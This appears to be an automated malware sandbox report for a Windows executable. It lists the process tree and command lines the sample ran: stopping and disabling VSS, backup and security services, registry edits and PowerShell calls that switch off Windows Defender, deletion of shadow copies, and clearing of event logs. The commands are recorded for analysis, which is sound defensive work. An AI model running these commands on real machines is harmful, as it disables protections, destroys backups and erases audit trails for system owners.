cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 1276 wrote to memory of 1236 1276 net.exe net1.exe PID 1276 wrote to memory of 1236 1276 net.exe net1.exe PID 1276 wrote to memory of 1236 1276 net.exe net1.exe PID 2632 wrote to memory of 2552 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 2552 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 2552 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2552 wrote to memory of 3692 2552 net.exe net1.exe PID 2552 wrote to memory of 3692 2552 net.exe net1.exe PID 2552 wrote to memory of 3692 2552 net.exe net1.exe PID 2632 wrote to memory of 1668 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe sc.exe PID 2632 wrote to memory of 1668 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe sc.exe PID 2632 wrote to memory of 1668 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe sc.exe PID 2632 wrote to memory of 404 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe sc.exe PID 2632 wrote to memory of 404 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe sc.exe PID 2632 wrote to memory of 404 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe sc.exe PID 2632 wrote to memory of 808 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe sc.exe PID 2632 wrote to memory of 808 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe sc.exe PID 2632 wrote to memory of 808 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe sc.exe PID 2632 wrote to memory of 2232 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3864
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:512
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2220
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:788
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:1460
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:480
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1244
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1236
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_1323b" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1323b" /y3⤵PID:3692
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1668
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:404
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:808
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:2232
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:1332
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:1744
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1784
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2044
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_1323b" start= disabled2⤵PID:2156
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2456
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2936
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3036
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1496
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:848
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2768
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:3672
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:3524
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3664
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1472
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:3876
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1888
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:2640
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1176
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2684
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2756
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:2088
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:3496
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1316
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:3676
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2572
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:868
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:3592
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:3488
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1044 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:332 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3996 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2052
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1844
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1988
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2944
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:3788 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:984
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:916 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3148 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3184 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2084 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1728 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3252 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1348
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3220 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:3528
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2916 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1552
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3412
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
MD5
a787ec6fc0706bec7496dabdc62cc9b5
SHA131763f89f9b5b185d382422adf8d601403e58f79
SHA25610e0355fbfa4da168a35a5254d9c78f8e7c47840e1fd05c326617eafd9f6becc
SHA51230c69b6787dd6ce58ad84fce8ca9e6055fcebcb319bff37c1e3122457a8922b4129818bd88439f8a5c74e3304341d8818a91deef19b2ab085d6b9e8dec3febdf